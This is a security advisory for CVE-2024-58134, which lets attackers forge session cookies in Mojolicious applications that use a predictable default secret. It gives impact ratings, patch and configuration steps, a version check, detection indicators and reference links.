CVE-2024-58134
📋 TL;DR
This vulnerability allows attackers to forge session cookies in Mojolicious web applications by exploiting predictable default HMAC secrets. Attackers who know or guess the secret can tamper with or hijack user sessions. All Mojolicious applications using default session configuration are affected.
💻 Affected Systems
- Mojolicious
📦 What is this software?
Mojolicious by Mojolicious
⚠️ Risk & Real-World Impact
Worst Case
Complete session hijacking allowing attackers to impersonate any user, access sensitive data, and perform unauthorized actions as authenticated users.
Likely Case
Session tampering and privilege escalation where attackers modify session data to gain unauthorized access or elevate privileges.
If Mitigated
No impact if proper custom secrets are configured and strong session management controls are implemented.
🎯 Exploit Status
Exploitation requires knowledge of the default secret or application class name, which can often be guessed or discovered through information disclosure.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Fixed in development versions; ensure you're using latest Mojolicious with proper configuration
Vendor Advisory: https://docs.mojolicious.org/Mojolicious/Guides/FAQ#What-does-Your-secret-passphrase-needs-to-be-changed-mean
Restart Required: Yes
Instructions:
1. Update to latest Mojolicious version. 2. Set a strong custom secret in your application configuration. 3. Restart the application server.
🔧 Temporary Workarounds
Configure Custom Session Secret
allSet a strong, random secret in your Mojolicious application configuration to replace the default predictable secret.
# In your Mojolicious application configuration:
app->secrets(['your-strong-random-secret-here']);
🧯 If You Can't Patch
- Implement additional session validation layers and monitor for suspicious session activity
- Use web application firewall rules to detect and block cookie tampering attempts
🔍 How to Verify
Check if Vulnerable:
Check if your Mojolicious application uses default session configuration without explicitly setting 'secrets' in the configuration.Check Version:
perl -MMojolicious -e 'print Mojolicious->VERSION'Verify Fix Applied:
Verify that a strong custom secret is configured and test that session cookies cannot be forged with the old/default secret.📡 Detection & Monitoring
Log Indicators:
- Multiple failed session validations from same IP
- Session ID reuse across different users
- Unexpected session parameter changes
Network Indicators:
- Unusual cookie manipulation attempts
- Requests with forged session cookies
SIEM Query:
source="web_logs" AND (message="session validation failed" OR message="invalid session") AND count > threshold🔗 References
- https://docs.mojolicious.org/Mojolicious/Guides/FAQ#What-does-Your-secret-passphrase-needs-to-be-changed-mean
- https://github.com/hashcat/hashcat/pull/4090
- https://github.com/mojolicious/mojo/pull/1791
- https://github.com/mojolicious/mojo/pull/2200
- https://github.com/mojolicious/mojo/pull/2252
- https://lists.debian.org/debian-perl/2025/05/msg00016.html
- https://lists.debian.org/debian-perl/2025/05/msg00017.html
- https://lists.debian.org/debian-perl/2025/05/msg00018.html
- https://medium.com/securing/baking-mojolicious-cookies-revisited-a-case-study-of-solving-security-problems-through-security-by-13da7c225802
- https://metacpan.org/release/SRI/Mojolicious-9.39/source/lib/Mojolicious.pm#L51
- https://www.synacktiv.com/publications/baking-mojolicious-cookies
